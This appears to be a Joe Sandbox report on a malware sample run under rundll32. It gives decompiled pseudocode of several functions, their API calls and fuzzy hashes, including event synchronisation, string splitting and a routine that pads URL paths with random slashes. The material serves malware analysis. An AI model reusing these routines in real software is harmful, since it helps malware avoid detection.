0x00000000
0x00000000
0x00a1515c
0x00a15146
0x00000000
0x00a1515e
0x00a1515e
0x00a1515e
0x00a15164
0x00a15166
0x00a15166
0x00a15170
0x00a15174
0x00a15186
0x00a15186
0x00a1518a
0x00a15190
0x00a15190
0x00a15193
0x00a15195
0x00a15198
0x00a15198
0x00a1519f
0x00a151a5
0x00a151a5

APIs

Part of subcall function 00A1A090: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,770CC740,00A1987E,74666F53,00000000,?,00000000,?,?,00A1726B), ref: 00A1A0C6
Part of subcall function 00A1A090: lstrcpy.KERNEL32(00000000,00000000), ref: 00A1A0EA
Part of subcall function 00A1A090: lstrcat.KERNEL32(00000000,00000000), ref: 00A1A0F2

CreateEventA.KERNEL32(00A1D234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A12649,?,?,?), ref: 00A150F4

Part of subcall function 00A1A07B: HeapFree.KERNEL32(00000000,00000000,00A18705,00000000,?,?,00000000,?,?,?,?,?,?,00A12540,00000000), ref: 00A1A087

WaitForSingleObject.KERNEL32(00000000,00004E20,00A12649,00000000,?,00000000,?,00A12649,?,?,?,?,?,?,?,00A19D1C), ref: 00A15152
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00A12649,?,?,?), ref: 00A15180
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A12649,?,?,?), ref: 00A15198

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 571a5935ef1d288b6687d1209a2e4638c5416cace5adfc5c9aefc278221c0fbd
Instruction ID: f9499f4ba85d382fd7d11925bface927db56af5def4cea8b996c98b6918ac4d3
Opcode Fuzzy Hash: 571a5935ef1d288b6687d1209a2e4638c5416cace5adfc5c9aefc278221c0fbd
Instruction Fuzzy Hash: B521E432D41B11FBD722ABB89C44BDA739AAB98761F044724FD019B250D770CC818654

Uniqueness

Uniqueness Score: -1.00%

Function 00A1259A, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00A1259A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00A18E87(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00A18CA3(_t23);
						}
					}
					return _t38;
				}
				if(E00A194F1(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xa1d234, 1, 0,  *0xa1d2f0);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00A1275C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00A18760(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00A172B8(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00A150B5( &_v32, _t39);
					goto L13;
				}
			}

0x00a1259a
0x00a125a7
0x00a125ad
0x00a125ae
0x00a125af
0x00a125b0
0x00a125b1
0x00a125b5
0x00a125c1
0x00a125c5
0x00a1264d
0x00a1264d
0x00a12650
0x00a12652
0x00a1265a
0x00a12660
0x00a12663
0x00a12663
0x00a12660
0x00a1266e
0x00a1266e
0x00a125d8
0x00a125da
0x00a125da
0x00a125f1
0x00a125f5
0x00a125f8
0x00a12603
0x00a1260a
0x00a1260a
0x00a12616
0x00a12617
0x00a12625
0x00a12619
0x00a12619
0x00a1261a
0x00a1261b
0x00a1261c
0x00a1261d
0x00a1261e
0x00a1261e
0x00a1262a
0x00a1262f
0x00a12631
0x00a12633
0x00a12633
0x00a1263a
0x00000000
0x00a1263c
0x00a1263c
0x00a12649
0x00000000
0x00a12649

APIs

CreateEventA.KERNEL32(00A1D234,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730,?,?,?,?,00A19D1C,?,00000001), ref: 00A125EB
SetEvent.KERNEL32(00000000,?,?,?,?,00A19D1C,?,00000001,00A17299,00000002,?,?,00A17299), ref: 00A125F8
Sleep.KERNEL32(00000BB8,?,?,?,?,00A19D1C,?,00000001,00A17299,00000002,?,?,00A17299), ref: 00A12603
CloseHandle.KERNEL32(00000000,?,?,?,?,00A19D1C,?,00000001,00A17299,00000002,?,?,00A17299), ref: 00A1260A

Part of subcall function 00A1275C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A1262A,?,00A1262A,?,?,?,?,?,00A1262A,?), ref: 00A12836
Part of subcall function 00A1275C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00A1262A,?,?,?,?,?,00A19D1C,?), ref: 00A1285E

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 46611b2dd757f50b277171bc24252b5d7152d226679812cccc2354a5fccae8d1
Instruction ID: e648076705dc689371153bbe402bf000dceaf52309db023424f66f9a9018ac51
Opcode Fuzzy Hash: 46611b2dd757f50b277171bc24252b5d7152d226679812cccc2354a5fccae8d1
Instruction Fuzzy Hash: 95218772D00219EFCB10AFE48985AEEB379EB48350B058525F521A7180EB74DD96CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A14C35, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A14C35(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00A1550F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00a14c41
0x00a14c45
0x00a14c46
0x00a14c47
0x00a14c49
0x00a14c4b
0x00a14c50
0x00a14c53
0x00a14cea
0x00a14cf1
0x00a14cf1
0x00a14c5c
0x00a14c63
0x00a14c73
0x00a14c73
0x00a14c79
0x00a14c7b
0x00a14c80
0x00a14c89
0x00a14c91
0x00a14c94
0x00a14c9f
0x00a14ca3
0x00a14ca5
0x00a14ca6
0x00a14caf
0x00a14cb3
0x00a14cc4
0x00a14cb5
0x00a14cba
0x00a14cbf
0x00a14cce
0x00a14cce
0x00a14ca3
0x00a14cd4
0x00a14cda
0x00a14cda
0x00a14ce3
0x00a14ce8
0x00a14ce8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00A14C63
lstrlenW.KERNEL32(?), ref: 00A14C99
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00A14CBA
SysFreeString.OLEAUT32(?), ref: 00A14CCE

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 5b33a76e298d6229efdff674b045753aab9db68227ee31306751a49c310aac26
Instruction ID: 5e0f704d24d789cb8d4339c7b5074b2992a35722e75b4d7ec31dfd340ddf9830
Opcode Fuzzy Hash: 5b33a76e298d6229efdff674b045753aab9db68227ee31306751a49c310aac26
Instruction Fuzzy Hash: 3D214F75A01609EFCB10DFA8D9889DEBBB9FF48355B108169E945E7210E730DA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A153E6, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A153E6(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xa1d1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xa1d208; // 0x7886acf0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xa1d208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00a153ee
0x00a153f1
0x00a153f7
0x00a1540f
0x00a15413
0x00a15416
0x00a15418
0x00a1541b
0x00a1541d
0x00a15420
0x00a15422
0x00a15422
0x00a15424
0x00a1542f
0x00a15434
0x00a15445
0x00a1544d
0x00a15452
0x00a15455
0x00a15458
0x00a1545a
0x00a15460
0x00a15463
0x00a15463
0x00a15463
0x00a1546e
0x00a15473
0x00a1547d

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A14A7F,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A153F1
RtlAllocateHeap.NTDLL(00000000,?), ref: 00A15409
memcpy.NTDLL(00000000,05489630,-00000008,?,?,?,00A14A7F,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A1544D
memcpy.NTDLL(00000001,05489630,00000001,00A13E0F,00000000,05489630), ref: 00A1546E

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 0e448978b03a7d57023ed741f4a090f046fe0a65e8965c6d7b074ceff8553fe6
Instruction ID: 56663b902a804ba4e39ac6f5f004ebf684731e481b2b6de5fadebb6b8f8cd906
Opcode Fuzzy Hash: 0e448978b03a7d57023ed741f4a090f046fe0a65e8965c6d7b074ceff8553fe6
Instruction Fuzzy Hash: 44110272A00114ABC714CBA9DC88DDEBBBEDB84360B144276F80497260FA709E85C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A183FE, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A183FE(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00A1550F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xa1c2bc);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xa1c2bc);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00a18409
0x00a1840d
0x00a1840f
0x00a18410
0x00a18418
0x00a18418
0x00a1841c
0x00000000
0x00000000
0x00a18413
0x00a18414
0x00a18417
0x00a18417
0x00a18424
0x00a1842b
0x00a1842f
0x00a18437
0x00a1843d
0x00a1843f
0x00a18444
0x00a18448
0x00a1844a
0x00a1844d
0x00a18454
0x00a18454
0x00a1845e
0x00a18461
0x00a18464
0x00a18464
0x00a18470
0x00a18470
0x00a1847d

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0548962C,?,?,?,00A1A34D,0548962C,?,?,00A17260), ref: 00A18418
StrTrimA.SHLWAPI(?,00A1C2BC,00000002,?,?,?,00A1A34D,0548962C,?,?,00A17260), ref: 00A18437
StrChrA.SHLWAPI(?,00000020,?,?,?,00A1A34D,0548962C,?,?,00A17260,?,?,?,?,?,00A1258B), ref: 00A18442
StrTrimA.SHLWAPI(00000001,00A1C2BC,?,?,?,00A1A34D,0548962C,?,?,00A17260,?,?,?,?,?,00A1258B), ref: 00A18454

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 6198480df0c9bac39d3d296f55c290baf60668988d96fa67fedf4c2259dc1a93
Instruction ID: dd5adcf7767603cf494872dc909c0832dcc20d3f8de2bb6c0d338227e0e601b1
Opcode Fuzzy Hash: 6198480df0c9bac39d3d296f55c290baf60668988d96fa67fedf4c2259dc1a93
Instruction Fuzzy Hash: 1D01B171645322ABD220DF699C48FABBE98FF89BA0F110519F981C7241EF64CC4282E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A090, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A1A090(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00A19067(_t8, _t1);
				_t16 = E00A1550F(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00A18228(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00A1550F(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00A1A07B(_t16);
				}
				return _t18;
			}

0x00a1a09b
0x00a1a09c
0x00a1a09f
0x00a1a0a1
0x00a1a0ac
0x00a1a0b0
0x00a1a0b5
0x00a1a0b9
0x00a1a0c1
0x00a1a0c6
0x00a1a0ce
0x00a1a0ce
0x00a1a0d7
0x00a1a0db
0x00a1a0e1
0x00a1a0e4
0x00a1a0ea
0x00a1a0ea
0x00a1a0f2
0x00a1a0f2
0x00a1a0f9
0x00a1a0f9
0x00a1a104

APIs

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

Part of subcall function 00A18228: wsprintfA.USER32 ref: 00A18284

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,770CC740,00A1987E,74666F53,00000000,?,00000000,?,?,00A1726B), ref: 00A1A0C6
lstrcpy.KERNEL32(00000000,00000000), ref: 00A1A0EA
lstrcat.KERNEL32(00000000,00000000), ref: 00A1A0F2

Strings

Soft, xrefs: 00A1A09C, 00A1A0B5

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 47dfdda8833c3e87dd1d8eacb3820aa2cf1d69e3b6d5452b8a9ae9f317a059a4
Instruction ID: db5cc232a4f00a266fe92f365983e053289050e67d8b3c5550ab70dfda451847
Opcode Fuzzy Hash: 47dfdda8833c3e87dd1d8eacb3820aa2cf1d69e3b6d5452b8a9ae9f317a059a4
Instruction Fuzzy Hash: 3E01F932540616F7CB12BBA4DC84AEF3BAEDF89361F044020F91559101DF74C9C6C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6FC6C54E, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6FC6C572

Part of subcall function 6FC6CC59: __fltout2.LIBCMT ref: 6FC6CC82

__cftog_l.LIBCMT ref: 6FC6C598
__cftoe_l.LIBCMT ref: 6FC6C5CA

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 2d38f0b9219359205acb8ec5ce25e631d074dfde35f3dcd04ce276701c49e475
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: D301407244824EBBCF029F94CC818DE3F62BB1D355B448556FA2859030E736D6B1BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6FC6B938, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6FC6B94F

Part of subcall function 6FC6BF66: ___BuildCatchObjectHelper.LIBCMT ref: 6FC6BF98
Part of subcall function 6FC6BF66: ___AdjustPointer.LIBCMT ref: 6FC6BFAF

_UnwindNestedFrames.LIBCMT ref: 6FC6B966
___FrameUnwindToState.LIBCMT ref: 6FC6B978
CallCatchBlock.LIBCMT ref: 6FC6B99C

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: a16f29c8f1f39c0d52843083da1c1c1f5abddd51cf49e19dc6f0ead60b625110
Instruction ID: 3ebeb6ccd851ca649b5d36306c62cc54ce2c5dcdf31ac8ca0c8a3b43bf1ba3a6
Opcode Fuzzy Hash: a16f29c8f1f39c0d52843083da1c1c1f5abddd51cf49e19dc6f0ead60b625110
Instruction Fuzzy Hash: 15010C32004209BBDF129F55CD80EDA7BBAFF48758F018515FE1865160E736E565EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A14ACE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A14ACE() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xa1d224; // 0x2dc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xa1d264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xa1d224; // 0x2dc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa1d1f0; // 0x5090000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00a14ace
0x00a14ad5
0x00a14b1f
0x00a14b21
0x00a14b21
0x00a14ad9
0x00a14adf
0x00a14ae4
0x00a14ae8
0x00a14aee
0x00a14af5
0x00000000
0x00000000
0x00a14af7
0x00a14afc
0x00000000
0x00000000
0x00000000
0x00a14afc
0x00a14afe
0x00a14b06
0x00a14b09
0x00a14b09
0x00a14b0f
0x00a14b16
0x00a14b19
0x00a14b19
0x00000000

APIs

SetEvent.KERNEL32(000002DC,00000001,00A1A580), ref: 00A14AD9
SleepEx.KERNEL32(00000064,00000001), ref: 00A14AE8
CloseHandle.KERNEL32(000002DC), ref: 00A14B09
HeapDestroy.KERNEL32(05090000), ref: 00A14B19

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d9941e1880fc3a51e02adf407ef982222ac30c9588cf56e2d22ae525f856f9cb
Instruction ID: 6f3ae17d89491ab172c091095bc28231388dbb0dc027f70ddbae1e049c2a0cb2
Opcode Fuzzy Hash: d9941e1880fc3a51e02adf407ef982222ac30c9588cf56e2d22ae525f856f9cb
Instruction Fuzzy Hash: 74F0C975749312DBEB20DBBDAD4CFC677ACAB1CBA1B058510BD11E72A4DA70D842C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A586, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A1A586(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00A1550F(_t2);
				if(_t34 != 0) {
					_t30 = E00A1550F(_t28);
					if(_t30 == 0) {
						E00A1A07B(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00A1A987(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00A1A987(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00a1a586
0x00a1a590
0x00a1a592
0x00a1a598
0x00a1a598
0x00a1a5a1
0x00a1a5a5
0x00a1a5b1
0x00a1a5b5
0x00a1a629
0x00a1a5b7
0x00a1a5b7
0x00a1a5bb
0x00a1a5c2
0x00a1a5c5
0x00a1a5df
0x00a1a5ce
0x00a1a5ce
0x00a1a5d2
0x00a1a5d5
0x00a1a5da
0x00a1a5da
0x00a1a5e4
0x00a1a60c
0x00a1a612
0x00a1a615
0x00a1a5e6
0x00a1a5e8
0x00a1a5f0
0x00a1a5fb
0x00a1a600
0x00a1a600
0x00a1a61c
0x00a1a623
0x00a1a624
0x00a1a624
0x00a1a5b5
0x00a1a634

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A19F48,00000000,00000000,00000000,05489698,?,?,00A1A278,?,05489698), ref: 00A1A592

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

Part of subcall function 00A1A987: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A1A5C0,00000000,00000001,00000001,?,?,00A19F48,00000000,00000000,00000000,05489698), ref: 00A1A995
Part of subcall function 00A1A987: StrChrA.SHLWAPI(?,0000003F,?,?,00A19F48,00000000,00000000,00000000,05489698,?,?,00A1A278,?,05489698,0000EA60,?), ref: 00A1A99F

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A19F48,00000000,00000000,00000000,05489698,?,?,00A1A278), ref: 00A1A5F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00A1A600
lstrcpy.KERNEL32(00000000,00000000), ref: 00A1A60C

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: d2590699fadc53ab6b5b56606d3aa86b7c8f974dcaca3e198a02a22360c83184
Instruction ID: 1216c84037e3c7d7fce7e3b17c03ffa362f220c5b0f480b01c07c1d4a8a8779a
Opcode Fuzzy Hash: d2590699fadc53ab6b5b56606d3aa86b7c8f974dcaca3e198a02a22360c83184
Instruction Fuzzy Hash: FB21D276505219EFCB02AF64CD44ADEBFBA9F2A390F088051F8059B211DA30CD8087A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A17502, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

